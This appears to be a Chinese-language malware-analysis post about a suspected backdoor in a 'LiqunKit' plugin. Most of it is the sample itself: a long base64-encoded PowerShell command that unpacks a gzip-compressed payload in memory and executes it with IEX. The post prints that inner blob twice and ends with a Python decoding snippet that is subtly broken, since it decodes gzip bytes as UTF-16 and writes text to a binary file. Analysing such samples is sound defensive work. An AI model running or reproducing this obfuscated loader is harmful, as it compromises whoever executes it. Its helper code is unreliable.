JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA

base64解码:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

继续怼其base64解码:

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
powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

结果一看是乱码,往后再看:

New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)

存在Gzip压缩,通过脚本解压,生成样本文件:

code2 = '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'
code2ed= base64.b64decode(code2).decode('UTF16')
f=open("decoded.gzip",'wb') 
f.write(code2ed) 
